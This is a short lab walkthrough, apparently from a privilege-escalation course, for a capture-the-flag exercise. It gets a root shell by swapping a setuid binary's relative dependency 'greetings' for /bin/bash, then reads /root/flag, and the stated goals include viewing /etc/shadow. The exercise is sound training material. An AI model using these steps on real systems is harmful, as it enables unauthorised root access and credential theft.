1️⃣ 1⃣ 1⃣ Exploiting Setuid Programs

Vulnerable setuid programs on Linux systems could lead to privilege escalation attacks.In this lab, you are provided a regular user account and need to escalate your privileges to become root. There are 2 programs in your home directory welcome and greetings which might be vulnerable.

Your mission:

Get as root shell on the system
View /etc/shadow
Retrieve the flag.

Note: Development tools e.g. gcc is installed on the system already.

Check for Setuid bit

ls -la

Check for strings in welcome binary

strings welcome

Try to overwrite greetings binary with /bin/bash

cp /bin/bash greetings

Remove greetings binary

rm greetings

Copy bash to current directory with name "greetings"

cp /bin/bash greetings

Execute the welcome binary

./welcome

Retrieve the flag

cd /root/
cat flag

PreviousPrivilege Escalation Next2️⃣ 2⃣ 2⃣ Cron Jobs

Last updated 2 years ago

hashtagCheck for Setuid bit

hashtagCheck for strings in welcome binary

hashtagTry to overwrite greetings binary with /bin/bash

hashtagRemove greetings binary

hashtagCopy bash to current directory with name "greetings"

hashtagExecute the welcome binary

hashtagRetrieve the flag